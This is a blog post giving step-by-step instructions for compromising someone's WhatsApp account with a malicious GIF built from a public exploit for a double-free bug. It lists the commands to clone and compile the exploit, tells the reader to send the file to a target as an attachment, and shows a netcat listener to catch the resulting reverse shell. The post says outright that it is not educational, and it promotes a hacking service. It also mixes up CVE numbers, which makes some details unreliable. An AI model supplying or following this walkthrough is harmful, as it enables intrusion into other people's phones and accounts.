How to Hack Whatsapp with Whatsapp Gif Exploit

Hacking WhatsApp Account is a top Google search term. It is the most widely used messaging app worldwide. Hackers have been trying to hack WhatsApp because of this. While some hacks are paid, others are free and only a few require skill. WhatsApp security breaches and exploits have increased dramatically due to the increase in users. We decided to create a guide for hacking WhatsApp using GIF Hack.

This post is not intended to be educational, but it will show how hackers can hack WhatsApp accounts by using only a gif. Although Whatsapp has fixed the bug in the latest update, there is a chance that you are still at risk of this hack.

 


check @ hackearwtsp.net official

Hack WhatsApp using a giffile:

Step 1: Copy the exploit from GitHub and clone it using the following command

git clone https://github.com/awakened1712/CVE-2019-11932

Step 2: Use the following command to change the Directory to the Exploit folder:

cd CVE-2018-11932

Step 3: Use the following command to compile the exploit:

gcc -o exploit egif_lib.c exploit.c

Step 4: Get any gif file you want from the internet. Because everyone loves cats, I'm going to use a cat.gif.

Step 5: Execute the command with the following:

./exploit /root/Desktop/cat.gif

Step 6: The malicious gif file can now be used. Send this gif file directly to the target WhatsApp.

Copy the cat.gif file to another WhatsApp user and send it as WhatsApp Document to them.

Notify WhatsApp that this file should not be sent as a Media file. Otherwise, WhatsApp will convert the gif into an MP4 file before it is sent. This renders the exploit inoperable. Instead, send it as an attachment.

Step 7: Open another Kali Linux terminal and run the following command:

nc -lnvp 4444

Step 8: After the file has been sent as a file, we wait for the victim to open it and then start WhatsApp Exploit.

Step 9: After the file has been opened, you will see a reverse shell.

You can do almost anything with the shell commands because it is a regular Linux shell. For more information on shell commands, see the documentation.

This is it folks, the WhatsApp account of the target has been compromised. You now have a root shell that allows you to take full advantage of this WhatsApp exploit.

WhatsApp Vulnerability Explained.


This vulnerability is present in WhatsApp and can be found with ID CVE-2018-11932. You can find detailed information about the vulnerability on exploitdb. This vulnerability is of double-free vulnerability type. It allows us to execute any command on the Android operating systems. We send a gif file to WhatsApp and it causes a buffer overload giving us a shell in which to run commands. This vulnerability is only available for WhatsApp version 2.19.244 and below.

 

 

Comments

Post a Comment